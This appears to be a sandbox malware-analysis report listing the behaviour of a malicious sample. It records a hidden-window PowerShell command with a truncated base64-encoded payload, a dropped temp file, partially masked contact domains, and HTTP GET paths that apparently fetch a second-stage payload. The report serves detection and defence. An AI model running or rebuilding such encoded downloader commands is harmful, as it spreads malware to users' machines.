Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1480
Modifies file system
Creates the following files
- %TEMP%\774030.cvr
Network activity
Connects to
- 'be####lpinghand.com':80
- 'ic#####ojetos.eng.br':443
- 'he###et.info':80
- 'tr#####pduochanoi.info':80
- 'pr##.uk.net':443
TCP
HTTP GET requests
- http://www.be####lpinghand.com/wp-admin/tsh4/
- http://he###et.info/clickandbuilds/mV8Sn/
- http://tr#####pduochanoi.info/wp-admin/w3pg1ny/
Other
- 'ic#####ojetos.eng.br':443
- 'pr##.uk.net':443
UDP
- DNS ASK be####lpinghand.com
- DNS ASK sa#####.devitsandbox.com
- DNS ASK ic#####ojetos.eng.br
- DNS ASK he###et.info
- DNS ASK tr#####pduochanoi.info
- DNS ASK pr##.uk.net
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...' (with hidden window)
